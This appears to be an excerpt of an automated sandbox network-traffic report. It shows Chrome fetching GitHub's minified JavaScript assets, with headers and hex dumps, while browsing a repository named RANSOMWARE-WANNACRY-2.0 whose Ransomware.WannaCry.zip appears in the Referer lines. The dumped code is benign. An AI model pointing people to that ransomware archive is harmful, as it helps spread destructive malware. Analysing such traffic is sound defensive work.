                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 74 29 2c 6e 75 6c 6c 29 3a 65 7d 29 3b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6b 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7b 61 6e 63 68 6f 72 52 65 66 3a 76 2c 72 65 6e 64 65 72 41 6e 63 68 6f 72 3a 62 2c 61 6e 63 68 6f 72 49 64 3a 6d 2c 6f 70 65 6e 3a 69 2c 6f 6e 4f 70 65 6e 3a 63 2c 6f 6e 43 6c 6f 73 65 3a 73 7d 7d 2c 45 29 7d 3b 77 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 4d 65 6e 75 22 3b 6c 65 74 20 67 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 2e 2e 2e 74 7d 2c 6e 29 3d 3e 72 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 2e 2e 2e 74 2c 72 65 66 3a 6e 7d 29 29 2c 41 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 7b 2e 2e 2e 65
                                                                                      Data Ascii: loneElement(e,t),null):e});return r.createElement(k.Provider,{value:{anchorRef:v,renderAnchor:b,anchorId:m,open:i,onOpen:c,onClose:s}},E)};w.displayName="Menu";let g=r.forwardRef(({children:e,...t},n)=>r.cloneElement(e,{...t,ref:n})),A=r.forwardRef(({...e
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6c 65 74 20 66 3d 28 7b 72 65 6e 64 65 72 41 6e 63 68 6f 72 3a 65 2c 61 6e 63 68 6f 72 52 65 66 3a 74 2c 61 6e 63 68 6f 72 49 64 3a 6e 2c 63 68 69 6c 64 72 65 6e 3a 66 2c 6f 70 65 6e 3a 76 2c 6f 6e 4f 70 65 6e 3a 70 2c 6f 6e 43 6c 6f 73 65 3a 6d 2c 68 65 69 67 68 74 3a 62 2c 77 69 64 74 68 3a 45 2c 6f 76 65 72 6c 61 79 50 72 6f 70 73 3a 68 2c 66 6f 63 75 73 54 72 61 70 53 65 74 74 69 6e 67 73 3a 79 2c 66 6f 63 75 73 5a 6f 6e 65 53 65 74 74 69 6e 67 73 3a 6b 2c 73 69 64 65 3a 77 3d 22 6f 75 74 73 69 64 65 2d 62 6f 74 74 6f 6d 22 2c 61 6c 69 67 6e 3a 67 3d 22 73 74 61 72 74 22 2c 61 6c 69 67 6e 6d 65 6e 74 4f 66 66 73 65 74 3a 41 2c 61 6e 63 68 6f 72 4f 66 66 73 65 74 3a 43 7d 29 3d 3e 7b 6c 65 74 20 4c 3d 28 30 2c 75 2e 69 29 28 74 29 2c 5b 4f 2c 52 5d 3d
                                                                                      Data Ascii: let f=({renderAnchor:e,anchorRef:t,anchorId:n,children:f,open:v,onOpen:p,onClose:m,height:b,width:E,overlayProps:h,focusTrapSettings:y,focusZoneSettings:k,side:w="outside-bottom",align:g="start",alignmentOffset:A,anchorOffset:C})=>{let L=(0,u.i)(t),[O,R]=
                                                                                      2024-03-23 14:47:24 UTC995INData Raw: 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 41 6e 63 68 6f 72 65 64 4f 76 65 72 6c 61 79 22 7d 2c 31 36 35 34 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 50 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 34 38 38 35 38 29 2c 69 3d 6e 28 36 36 30 34 34 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 3d 5b 5d 29 7b 6c 65 74 20 6e 3d 28 30 2c 69 2e 69 29 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6e 74 61 69 6e 65 72 52 65 66 29 2c 6f 3d 28 30 2c 69 2e 69 29 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 69 6e 69 74 69 61 6c 46 6f 63 75 73 52 65 66 29 2c 75 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 64 69 73 61 62 6c 65 64 2c 61 3d 72 2e 75 73 65 52 65 66 28 29 2c 63 3d 72 2e
                                                                                      Data Ascii: .displayName="AnchoredOverlay"},16545:(e,t,n)=>{n.d(t,{P:()=>o});var r=n(67294),l=n(48858),i=n(66044);function o(e,t=[]){let n=(0,i.i)(null==e?void 0:e.containerRef),o=(0,i.i)(null==e?void 0:e.initialFocusRef),u=null==e?void 0:e.disabled,a=r.useRef(),c=r.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      54192.168.2.1649758185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC737OUTGET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8642
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Sat, 10 Feb 2024 01:12:23 GMT
                                                                                      ETag: 0x8DC29D55635FA6B
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 2426291
                                                                                      X-Served-By: cache-iad-kiad7000162-IAD, cache-ewr18127-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 3378, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 1ee9659e4e7a67099302e430a7717730fdddaffe
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 2d 39 37 38 61 62 63 30 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 29 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 74 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 23 22 29 29 7c 7c 74 2e 6c 65 6e 67 74 68 3b 79 69 65 6c 64 7b 74 79 70 65 3a 74 2e 73 6c 69 63 65 28 30 2c 65 29 2c 74 61 67 3a 74 2e 73 6c 69 63 65 28 65 2b 31 2c 6e 29 2c 6d 65 74 68 6f 64 3a 74 2e 73 6c 69 63 65 28 6e 2b 31 29 7c 7c 22 68 61 6e 64 6c 65 45 76 65 6e 74 22 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 73 28 65 29 29 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2e 74 79 70 65 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 65 2e 73 68 61 64 6f 77 52 6f 6f 74 29 7b 66 6f 72 28 6c
                                                                                      Data Ascii: "),n=Math.max(0,t.lastIndexOf("#"))||t.length;yield{type:t.slice(0,e),tag:t.slice(e+1,n),method:t.slice(n+1)||"handleEvent"}}}function d(e){for(let t of s(e))e.addEventListener(t.type,c)}function u(e,t){let n=e.tagName.toLowerCase();if(e.shadowRoot){for(l
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 3b 6c 65 74 20 43 61 74 61 6c 79 73 74 44 65 6c 65 67 61 74 65 3d 63 6c 61 73 73 20 43 61 74 61 6c 79 73 74 44 65 6c 65 67 61 74 65 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 2c 6e 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 74 68 69 73 2c 6e 29 7d 3b 6c 65 74 20 6f 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                      Data Ascii: ;let CatalystDelegate=class CatalystDelegate{constructor(e){let t=this,n=e.prototype.connectedCallback;e.prototype.connectedCallback=function(){t.connectedCallback(this,n)};let o=e.prototype.disconnectedCallback;e.prototype.disconnectedCallback=function()
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 73 68 61 64 6f 77 52 6f 6f 74 29 2c 69 28 6f 29 29 2c 6c 28 65 29 2c 69 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 2c 74 3f 2e 63 61 6c 6c 28 65 29 2c 65 2e 73 68 61 64 6f 77 52 6f 6f 74 26 26 28 6c 28 6e 3d 65 2e 73 68 61 64 6f 77 52 6f 6f 74 29 2c 69 28 6e 29 29 7d 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 29 7b 74 3f 2e 63 61 6c 6c 28 65 29 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 2c 6e 2c 6f 2c 72 29 7b 70 28 65 29 2c 22 64 61 74 61 2d 63 61 74 61 6c 79 73 74 22 21 3d 3d 74 26 26 72 26 26 72 2e 63 61 6c 6c 28 65 2c 74 2c 6e 2c 6f 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 77 28 65 2c 74 29 7b 69 66 28 21 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e
                                                                                      Data Ascii: shadowRoot),i(o)),l(e),i(e.ownerDocument),t?.call(e),e.shadowRoot&&(l(n=e.shadowRoot),i(n))}disconnectedCallback(e,t){t?.call(e)}attributeChangedCallback(e,t,n,o,r){p(e),"data-catalyst"!==t&&r&&r.call(e,t,n,o)}};function w(e,t){if(!Object.prototype.hasOwn
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 43 2c 66 69 72 73 74 49 6e 74 65 72 61 63 74 69 6f 6e 3a 28 29 3d 3e 6b 2c 76 69 73 69 62 6c 65 3a 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 74 3d 3e 7b 6c 65 74 20 6e 3d 6e 65 77 20 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 65 3d 3e 7b 66 6f 72 28 6c 65 74 20 6f 20 6f 66 20 65 29 69 66 28 6f 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 29 7b 74 28 29 2c 6e 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 3b 72 65 74 75 72 6e 7d 7d 2c 7b 72 6f 6f 74 4d 61 72 67 69 6e 3a 22 30 70 78 20 30 70 78 20 32 35 36 70 78 20 30 70 78 22 2c 74 68 72 65 73 68 6f 6c 64 3a 2e 30 31 7d 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 29 6e 2e 6f 62 73 65 72 76 65 28 74 29 7d 29
                                                                                      Data Ascii: C,firstInteraction:()=>k,visible:e=>new Promise(t=>{let n=new IntersectionObserver(e=>{for(let o of e)if(o.isIntersecting){t(),n.disconnect();return}},{rootMargin:"0px 0px 256px 0px",threshold:.01});for(let t of document.querySelectorAll(e))n.observe(t)})
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 3a 74 68 69 73 2e 63 6c 69 65 6e 74 49 64 2c 70 61 67 65 5f 76 69 65 77 73 3a 65 2c 65 76 65 6e 74 73 3a 74 2c 72 65 71 75 65 73 74 5f 63 6f 6e 74 65 78 74 3a 7b 72 65 66 65 72 72 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3b 74 72 79 7b 65 3d 77 69 6e 64 6f 77 2e 74 6f 70 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 7d 63 61 74 63 68 28 74 29 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 74 72 79 7b 65 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 7d 63 61 74 63 68 28 65 29 7b 7d 7d 72 65 74 75 72 6e 22 22 3d 3d 3d 65 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 2c 65 7d 28 29 2c 75 73 65 72 5f 61 67 65 6e 74 3a 6e 61 76 69 67 61 74 6f 72 2e 75 73 65
                                                                                      Data Ascii: :this.clientId,page_views:e,events:t,request_context:{referrer:function(){let e;try{e=window.top.document.referrer}catch(t){if(window.parent)try{e=window.parent.document.referrer}catch(e){}}return""===e&&(e=document.referrer),e}(),user_agent:navigator.use
                                                                                      2024-03-23 14:47:24 UTC374INData Raw: 28 6f 29 29 7b 6c 65 74 7b 6e 61 6d 65 3a 6f 2c 63 6f 6e 74 65 6e 74 3a 61 7d 3d 72 2c 69 3d 6f 2e 72 65 70 6c 61 63 65 28 60 24 7b 65 7d 2d 60 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 2d 2f 67 2c 22 5f 22 29 3b 22 75 72 6c 22 3d 3d 3d 69 3f 74 3d 61 3a 6e 5b 69 5d 3d 61 7d 69 66 28 21 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 60 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 20 24 7b 65 7d 2d 75 72 6c 20 6d 65 74 61 20 74 61 67 20 6e 6f 74 20 66 6f 75 6e 64 60 29 3b 72 65 74 75 72 6e 7b 63 6f 6c 6c 65 63 74 6f 72 55 72 6c 3a 74 2c 2e 2e 2e 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 6c 65 6e 67 74 68 3e 30 3f 7b 62 61 73 65 43 6f 6e 74 65 78 74 3a 6e 7d 3a 7b 7d 7d 7d 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 76 65
                                                                                      Data Ascii: (o)){let{name:o,content:a}=r,i=o.replace(`${e}-`,"").replace(/-/g,"_");"url"===i?t=a:n[i]=a}if(!t)throw Error(`AnalyticsClient ${e}-url meta tag not found`);return{collectorUrl:t,...Object.keys(n).length>0?{baseContext:n}:{}}}}}]);//# sourceMappingURL=ve


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      55192.168.2.1649759185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC687OUTGET /assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8876
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 14 Dec 2023 17:45:36 GMT
                                                                                      ETag: 0x8DBFCCC7AFAE6D5
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 1978950
                                                                                      X-Served-By: cache-iad-kcgs7200040-IAD, cache-ewr18131-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1911, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 0ebe570fbe6194fe1b9d1e5d3c2c2e4782e1798e
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 37 39 36 35 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 4f 4c 3a 28 29 3d 3e 78 2c 61 6a 3a 28 29 3d 3e 77 2c 66 57 3a 28 29 3d 3e 68 2c 67 73 3a 28 29 3d 3e 6b 2c 6c 72 3a 28 29 3d 3e 43 2c 70 47 3a 28 29 3d 3e 54 2c 72 55 3a 28 29 3d 3e 5f 2c 79 71 3a 28 29 3d 3e 55 7d 29 3b 76 61 72 20 69 2c 72 2c 61 2c 6f 2c 73 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 37
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_react-router-dom_dist_index_js"],{79655:(e,t,n)=>{n.d(t,{OL:()=>x,aj:()=>w,fW:()=>h,gs:()=>k,lr:()=>C,pG:()=>T,rU:()=>_,yq:()=>U});var i,r,a,o,s=n(67294),l=n(7
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 65 6e 61 6d 65 3a 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 62 61 73 65 6e 61 6d 65 2c 66 75 74 75 72 65 3a 66 28 7b 7d 2c 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 75 74 75 72 65 2c 7b 76 37 5f 70 72 65 70 65 6e 64 42 61 73 65 6e 61 6d 65 3a 21 30 7d 29 2c 68 69 73 74 6f 72 79 3a 28 30 2c 75 2e 6c 58 29 28 7b 77 69 6e 64 6f 77 3a 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 77 69 6e 64 6f 77 7d 29 2c 68 79 64 72 61 74 69 6f 6e 44 61 74 61 3a 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 68 79 64 72 61 74 69 6f 6e 44 61 74 61 29 7c 7c 28 28 69 3d 6e 75 6c 6c 3d 3d 28 6e 3d 77 69 6e 64 6f 77 29 3f 76 6f 69 64 20 30 3a 6e 2e 5f 5f 73 74 61 74 69 63 52 6f 75 74 65 72 48 79 64 72 61 74 69 6f 6e 44 61 74 61 29 26 26 69 2e
                                                                                      Data Ascii: sename:null==t?void 0:t.basename,future:f({},null==t?void 0:t.future,{v7_prependBasename:!0}),history:(0,u.lX)({window:null==t?void 0:t.window}),hydrationData:(null==t?void 0:t.hydrationData)||((i=null==(n=window)?void 0:n.__staticRouterHydrationData)&&i.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 65 53 74 61 74 65 28 29 2c 54 3d 73 2e 75 73 65 52 65 66 28 6e 65 77 20 4d 61 70 29 2c 7b 76 37 5f 73 74 61 72 74 54 72 61 6e 73 69 74 69 6f 6e 3a 45 7d 3d 69 7c 7c 7b 7d 2c 52 3d 73 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 65 3d 3e 7b 45 26 26 67 3f 67 28 65 29 3a 65 28 29 7d 2c 5b 45 5d 29 2c 5f 3d 73 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 7b 64 65 6c 65 74 65 64 46 65 74 63 68 65 72 73 3a 69 2c 75 6e 73 74 61 62 6c 65 5f 66 6c 75 73 68 53 79 6e 63 3a 72 2c 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 4f 70 74 73 3a 6f 7d 3d 74 3b 69 2e 66 6f 72 45 61 63 68 28 65 3d 3e 54 2e 63 75 72 72 65 6e 74 2e 64 65 6c 65 74 65 28 65 29 29 2c 65 2e 66 65 74 63 68 65 72 73 2e 66 6f 72 45 61 63 68 28 28 65 2c
                                                                                      Data Ascii: seState(),T=s.useRef(new Map),{v7_startTransition:E}=i||{},R=s.useCallback(e=>{E&&g?g(e):e()},[E]),_=s.useCallback((e,t)=>{let{deletedFetchers:i,unstable_flushSync:r,unstable_viewTransitionOpts:o}=t;i.forEach(e=>T.current.delete(e)),e.fetchers.forEach((e,
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 63 61 74 69 6f 6e 2e 6b 65 79 26 26 64 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 5b 64 2c 76 2c 72 2e 6c 6f 63 61 74 69 6f 6e 2c 6f 5d 29 2c 73 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 21 75 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 26 26 77 26 26 28 6c 28 77 2e 73 74 61 74 65 29 2c 66 28 7b 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3a 21 30 2c 66 6c 75 73 68 53 79 6e 63 3a 21 31 2c 63 75 72 72 65 6e 74 4c 6f 63 61 74 69 6f 6e 3a 77 2e 63 75 72 72 65 6e 74 4c 6f 63 61 74 69 6f 6e 2c 6e 65 78 74 4c 6f 63 61 74 69 6f 6e 3a 77 2e 6e 65 78 74 4c 6f 63 61 74 69 6f 6e 7d 29 2c 4c 28 76 6f 69 64 20 30 29 29 7d 2c 5b 75 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 2c 77 5d 29 3b 6c 65 74 20 78 3d 73 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 28 7b 63 72
                                                                                      Data Ascii: cation.key&&d.resolve()},[d,v,r.location,o]),s.useEffect(()=>{!u.isTransitioning&&w&&(l(w.state),f({isTransitioning:!0,flushSync:!1,currentLocation:w.currentLocation,nextLocation:w.nextLocation}),L(void 0))},[u.isTransitioning,w]);let x=s.useMemo(()=>({cr
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6e 74 65 78 74 28 63 2e 55 73 29 2c 4c 3d 21 31 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 70 26 26 52 2e 74 65 73 74 28 70 29 26 26 28 6e 3d 70 2c 45 29 29 74 72 79 7b 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 3d 6e 65 77 20 55 52 4c 28 70 2e 73 74 61 72 74 73 57 69 74 68 28 22 2f 2f 22 29 3f 65 2e 70 72 6f 74 6f 63 6f 6c 2b 70 3a 70 29 2c 6e 3d 28 30 2c 75 2e 5a 6e 29 28 74 2e 70 61 74 68 6e 61 6d 65 2c 67 29 3b 74 2e 6f 72 69 67 69 6e 3d 3d 3d 65 2e 6f 72 69 67 69 6e 26 26 6e 75 6c 6c 21 3d 6e 3f 70 3d 6e 2b 74 2e 73 65 61 72 63 68 2b 74 2e 68 61 73 68 3a 4c 3d 21 30 7d 63 61 74 63 68 28 65 29 7b 7d 6c 65 74 20 62 3d 28 30 2c 63 2e 6f 51 29 28 70 2c 7b 72 65 6c 61
                                                                                      Data Ascii: ntext(c.Us),L=!1;if("string"==typeof p&&R.test(p)&&(n=p,E))try{let e=new URL(window.location.href),t=new URL(p.startsWith("//")?e.protocol+p:p),n=(0,u.Zn)(t.pathname,g);t.origin===e.origin&&null!=n?p=n+t.search+t.hash:L=!0}catch(e){}let b=(0,c.oQ)(p,{rela
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 77 65 72 43 61 73 65 28 29 2c 6b 3d 6b 3f 6b 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 6e 75 6c 6c 2c 52 3d 52 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 6c 65 74 20 43 3d 22 2f 22 21 3d 3d 52 26 26 52 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 3f 52 2e 6c 65 6e 67 74 68 2d 31 3a 52 2e 6c 65 6e 67 74 68 2c 55 3d 78 3d 3d 3d 52 7c 7c 21 6c 26 26 78 2e 73 74 61 72 74 73 57 69 74 68 28 52 29 26 26 22 2f 22 3d 3d 3d 78 2e 63 68 61 72 41 74 28 43 29 2c 46 3d 6e 75 6c 6c 21 3d 6b 26 26 28 6b 3d 3d 3d 52 7c 7c 21 6c 26 26 6b 2e 73 74 61 72 74 73 57 69 74 68 28 52 29 26 26 22 2f 22 3d 3d 3d 6b 2e 63 68 61 72 41 74 28 52 2e 6c 65 6e 67 74 68 29 29 2c 6a 3d 7b 69 73 41 63 74 69 76 65 3a 55 2c 69 73 50 65 6e 64 69 6e 67 3a 46 2c 69 73 54 72 61 6e 73 69 74 69
                                                                                      Data Ascii: werCase(),k=k?k.toLowerCase():null,R=R.toLowerCase());let C="/"!==R&&R.endsWith("/")?R.length-1:R.length,U=x===R||!l&&x.startsWith(R)&&"/"===x.charAt(C),F=null!=k&&(k===R||!l&&k.startsWith(R)&&"/"===k.charAt(R.length)),j={isActive:U,isPending:F,isTransiti
